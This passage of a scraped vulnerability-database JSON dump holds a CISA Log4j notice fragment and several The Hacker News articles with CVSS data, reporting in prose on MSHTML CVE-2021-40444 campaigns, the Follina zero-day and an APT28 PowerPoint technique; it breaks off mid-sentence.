[File Director](< https://forums.ivanti.com/s/article/Apache-Log4j-Zero-Day-Vulnerability-and-Ivanti-File-Director-CVE-2021-44228?language=en_US>); and [MobileIron Core, MobileIron Sentry (Core/Cloud), and MobileIron Core Connector](<https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j>) and apply the necessary updates and workarounds.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/14/ivanti-updates-log4j-advisory-security-updates-multiple-products>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T00:00:00", "type": "cisa", "title": "Ivanti Updates Log4j Advisory with Security Updates for Multiple Products \u00a0", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-14T00:00:00", "id": "CISA:006B1DC6A817621E16EEB4560519A418", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/14/ivanti-updates-log4j-advisory-security-updates-multiple-products", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-3vEprTVA4BI/YULvTEzYNCI/AAAAAAAADz0/RpSk1fU9GbcY7e98Gg2r8aBRvy73Z52kACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nMicrosoft on Wednesday disclosed details of a targeted phishing campaign that leveraged a now-patched zero-day flaw in its MSHTML platform using specially-crafted Office documents to deploy Cobalt Strike Beacon on compromised Windows systems.\n\n\"These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders,\" Microsoft Threat Intelligence Center [said](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in a technical write-up. \"These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\"\n\nDetails about CVE-2021-40444 (CVSS score: 8.8) first [emerged](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) on September 7 after researchers from EXPMON alerted the Windows maker about a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users by taking advantage of a remote code execution vulnerability in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document,\" the researchers noted. Microsoft has since [rolled out a fix](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) for the vulnerability as part of its Patch Tuesday updates a week later on September 14.\n\nThe Redmond-based tech giant attributed the activities to related cybercriminal clusters it tracks as DEV-0413 and DEV-0365, the latter of which is the company's moniker for the emerging threat group associated with creating and managing the Cobalt Strike infrastructure used in the attacks. The earliest exploitation attempt by DEV-0413 dates back to August 18.\n\nThe exploit delivery mechanism originates from emails impersonating contracts and legal agreements hosted on file-sharing sites. Opening the malware-laced document leads to the download of a Cabinet archive file containing a DLL bearing an INF file extension that, when decompressed, leads to the execution of a function within that DLL. The DLL, in turn, retrieves remotely hosted shellcode \u2014 a custom Cobalt Strike Beacon loader \u2014 and loads it into the Microsoft address import tool.\n\nAdditionally, Microsoft said some of the infrastructures that were used by DEV-0413 to host the malicious artifacts were also involved in the delivery of BazaLoader and Trickbot payloads, a separate set of activities the company monitors under the codename DEV-0193 (and by Mandiant as UNC1878).\n\n\"At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack,\" the researchers said. \"It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\"\n\nIn an independent investigation, Microsoft's RiskIQ subsidiary attributed the attacks with high confidence to a ransomware syndicate known as Wizard Spider aka Ryuk, noting that the network infrastructure employed to provide command-and-control to the Cobalt Strike Beacon implants spanned more than 200 active servers.\n\n\"The association of a zero-day exploit with a ransomware group, however remote, is troubling,\" RiskIQ researchers [said](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>). It suggests either that turnkey tools like zero-day exploits have found their way into the already robust ransomware-as-a-service (RaaS) ecosystem or that the more operationally sophisticated groups engaged in traditional, government-backed espionage are using criminally controlled infrastructure to misdirect and impede attribution.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T07:19:00", "type": "thn", "title": "Windows MSHTML 0-Day Exploited to Deploy Cobalt Strike Beacon in Targeted Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-12T15:17:20", "id": "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "href": "https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T17:38:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgi3RXvGtPoTC8ufDqadLbye4bhkJjWs-Un41xcwOWrqQPpLekG-pG0Xxk-or-GInK-LQOG7QDpCF3p4FVNPMxdNLSsl4TgenAVq4LOJcfYcZ0LcgQ0zlwru8TY2ff5ffd7EEPtwFERwA4hDGj0uKeJYZBw1AGUroAFwL-QXSJrDONv8gHe7E2ghPpr/s728-e100/hacking-code.jpg>)\n\nCybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.\n\nThe vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document (\"[05-2022-0438.doc](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection>)\") that was uploaded to VirusTotal from an IP address in Belarus.\n\n\"It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code,\" the researchers [noted](<https://twitter.com/nao_sec/status/1530196847679401984>) in a series of tweets last week.\n\nAccording to security researcher Kevin Beaumont, who dubbed the flaw \"Follina,\" the maldoc leverages Word's [remote template](<https://attack.mitre.org/techniques/T1221/>) feature to fetch an HTML file from a server, which then makes use of the \"ms-msdt://\" URI scheme to run the malicious payload.\n\nThe shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.\n\n[MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>) is short for Microsoft Support Diagnostics Tool, a utility that's used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.\n\n\"There's a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled,\" Beaumont [explained](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>).\n\n\"[Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View,\" the researcher added.\n\nIn a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file (\"RDF842l.html\") that triggers the exploit originated from a now-unreachable domain named \"xmlformats[.]com.\"\n\n\"A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer,\" Huntress Labs' John Hammond [said](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>). \"Much like CVE-2021-40444, this extends the severity of this threat by not just 'single-click' to exploit, but potentially with a 'zero-click' trigger.\"\n\nMultiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.\n\nWhat's more, Richard Warren of NCC Group [managed](<https://twitter.com/buffaloverflow/status/1530866518279565312>) to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.\n\n\"Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking,\" Beaumont said. We have reached out to Microsoft for comment, and we'll update the story once we hear back.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T09:40:00", "type": "thn", "title": "Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-30T15:44:33", "id": "THN:E7762183A6F7B3DDB942D3F1F99748F6", "href": "https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjYUPLUjcZm_IOi_2W8OCO67vRS3dKYHbn9uyV27yUDW18dhUv8jXFX9JDvQYw6FCzwj__3eQkTEwAOG-s6nigko_jBV77WQl46SxYEsGMQxc5g2hIFfR11hGm-vi1oobscaw6jTNgq2ed6ZN5OE9wz9JHWzNk0PH1xq9WzsWMs18Gk_P_yhPWT0YQm>)\n\nA new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims with a previously undocumented PowerShell-based information stealer designed to harvest extensive details from infected machines.\n\n\"[T]he stealer is a PowerShell script, short with powerful collection capabilities \u2014 in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment,\" SafeBreach Labs researcher Tomer Bar [said](<https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/>) in a report published Wednesday.\n\nNearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at \"Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.\"\n\nThe phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be exploited using specially crafted Microsoft Office documents. The vulnerability was [patched](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) by Microsoft in September 2021, weeks after [reports](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) of active exploitation emerged in the wild.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgHnByMecpjc8CwGXlYLKRdnKgH6K5l2WpL2UN8Tsn4OgwoQxswAm4WoSD9d7rUtLNPFN59Z11rRxwTC3ZRa4tu-3rpZvcB0cO59nDNhYGmpe6L38Tx8Y-merXNp54673AbqS20eHA5cJ4CBUQ0KjBxCH5it3HfxkZ0_bBtO1JWp3_1j6rxKqM_SMJv>)\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" the Windows maker had noted.\n\nThe attack sequence described by SafeBreach begins with the targets receiving a spear-phishing email that comes with a Word document as an attachment. Opening the file triggers the exploit for CVE-2021-40444, resulting in the execution of a PowerShell script dubbed \"PowerShortShell\" that's capable of hoovering sensitive information and transmitting them to a command-and-control (C2) server.\n\nWhile infections involving the deployment of the info-stealer were observed on September 15, a day after Microsoft issued patches for the flaw, the aforementioned C2 server was also employed to harvest victims' Gmail and Instagram credentials as part of two phishing campaigns staged by the same adversary in July 2021. \n\nThe development is the latest in a string of attacks that have capitalized on the MSTHML rendering engine flaw, with Microsoft previously [disclosing](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that abused the vulnerability as part of an initial access campaign to distribute custom Cobalt Strike Beacon loaders.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T11:33:00", "type": "thn", "title": "Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-22T07:07:24", "id": "THN:C4188C7A44467E425407D33067C14094", "href": "https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:47", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8>)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker,\" SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) in a new report published Tuesday.\n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>), it has been put to use in [multiple attacks](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) ever since details pertaining to the flaw became public.\n\nThat same month, the technology giant [uncovered](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs [reported](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available [proof-of-concept Office exploit](<https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf>) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \"too-narrowly focused patch.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB>)\n\n\"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\" the researchers explained. \"When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\"\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host ([WSH](<https://en.wikipedia.org/wiki/Windows_Script_Host>)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>) malware payload from an attacker-controlled website.\n\nAs for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. \"So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\" the researchers said.\n\n\"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\" SophosLabs Principal Researcher Andrew Brandt said. \"Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button.\"\n\n\"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know,\" Brandt added. When reached for a response, a Microsoft spokesperson said \"we are investigating these reports and will take appropriate action as needed to help keep customers protected.\"\n\n**_Update:_** Microsoft told The Hacker News that the aforementioned exploit was indeed addressed with security updates that were released in September 2021. Sophos now notes that the CAB-less 40444 exploit \"may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack\" and that the patch blocks the malicious behavior.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-22T07:45:00", "type": "thn", "title": "New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-29T03:33:40", "id": "THN:8A60310AB796B7372A105B7C8811306B", "href": "https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-02T06:04:33", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgRdLCnYaPXc_hVvRWhZ1nKYDtBRo6rwk1xGSO3wDrqcJ04igkpjKQyuyHKgmgeHL6GS7XLJjB6WCffBWb-ntXiCGFrcggxS3t1sQxo2LiuX7WI9F-gwW3tPRARSzEWceyzsLgu1VSyZndaF36ZhDlzpBRvkHLp7Ao_zaUYJmthkY4IZN4znwcyRdpY/s728-e100/hacking.jpg>)\n\nThe Russian state-sponsored threat actor known as [APT28](<https://thehackernews.com/2022/09/researchers-identify-3-hacktivist.html>) has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.\n\nThe technique \"is designed to be triggered when the user starts the presentation mode and moves the mouse,\" cybersecurity firm Cluster25 [said](<https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/>) in a technical report. \"The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive.\"\n\nThe dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads.\n\nThe attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development ([OECD](<https://en.wikipedia.org/wiki/OECD>)), a Paris-based intergovernmental entity.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjM4urmpBb2OaNLBBurEzXMWD5Gc0bF0d-1A8k55IscX0Hlkq-v1VQ39Xj9y7iwnPFlRBxvY1w6ZlUWb5dYTHpIwA3gVd7mcXXY64dImoNQO7bXe84Wez6JCWTlrdS77BnSIF6DllbmNoGykj67hPrGivBZDqdvzOgXckRo6adoi5bgIMpmnmWEI4_Y/s728-e100/ppt.jpg>)\n\nCluster25 noted the attacks may be ongoing, considering that the URLs used in the attacks appeared active in August and September, although the hackers had previously laid the groundwork for the campaign between January and February.\n\nPotential targets of the operation likely include entities and individuals operating in the defense and government sectors of Europe and Eastern Europe, the company added, citing an analysis of geopolitical objectives and the gathered artifacts.\n\nThis is not the first time the adversarial collective has deployed Graphite. In January 2022, Trellix [disclosed](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>) a similar attack chain that exploited the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) to drop the backdoor.\n\nThe development is a sign that APT28 (aka Fancy Bear) continues to hone its technical tradecraft and evolve its methods for maximum impact as exploitation routes once deemed viable (e.g., macros) cease to be profitable.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-28T10:09:00", "type": "thn", "title": "Hackers Using PowerPoint Mouseover Trick to Infect Systems with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-02T05:18:39", "id": "THN:B399D1943153CEEF405B85D4310C2142", "href": "https://thehackernews.com/2022/09/hackers-using-powerpoint-mouseover.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:39", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjqkUGrj098m-d_WWiB3rvM91Eu1x3fZweKFwfNSYwVrZToTWUlCh3s3UvHQIXtbPP4vPubJ_dEdC7jSX7gGkeScLCqYsa37Zuw_hFBK6g9FbzvO5nMZPrRUk6fjS1F01cduuDD_mnZ-OKnauen-xJmprSHgWH_jmx8MYUffZvp4uojtUBzm6BbCwIZ>)\n\nCybersecurity researchers on Tuesday took the wraps off a multi-stage espionage campaign targeting high-ranking government officials overseeing national security policy and individuals in the defense industry in Western Asia.\n\nThe attack is unique as it leverages Microsoft OneDrive as a command-and-control (C2) server and is split into as many as six stages to stay as hidden as possible, Trellix \u2014 a new company created following the merger of security firms McAfee Enterprise and FireEye \u2014 said in a [report](<https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html>) shared with The Hacker News.\n\n\"This type of communication allows the malware to go unnoticed in the victims' systems since it will only connect to legitimate Microsoft domains and won't show any suspicious network traffic,\" Trellix explained.\n\nFirst signs of activity associated with the covert operation are said to have commenced as early as June 18, 2021, with two victims reported on September 21 and 29, followed by 17 more in a short span of three days between October 6 and 8.\n\n\"The attack is particularly unique due to the prominence of its victims, the use of a recent [security flaw], and the use of an attack technique that the team had not seen before,\" Christiaan Beek, lead scientist at Trellix, said. \"The objective was clearly espionage.\"\n\nTrellix attributed the sophisticated attacks with moderate confidence to the Russia-based [APT28](<https://malpedia.caad.fkie.fraunhofer.de/actor/sofacy>) group, also tracked under the monikers Sofacy, Strontium, Fancy Bear, and Sednit, based on similarities in the source code as well as in the attack indicators and geopolitical objectives.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiHATh-_6CXq1DE4gF63tRFptoK4b3k33uBkDfc-JwaJRbLhn0cxU2JHUh5A-0U_AsQ3XgqvcFjPKtR6AVo-_daYwK8-jLWPGzamt2d7MjD1zstHO8IFPqdv3NTZU3GvsI_Wdk9Q7rG6zd84PEcawqbp7bJMrog9xoaUDkiJadygQnO1Wh-qdlH79xN>)\n\n\"We are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were set up,\" Trellix security researcher Marc Elias said.\n\nThe infection chain begins with the execution of a Microsoft Excel file containing an exploit for the MSHTML remote code execution vulnerability 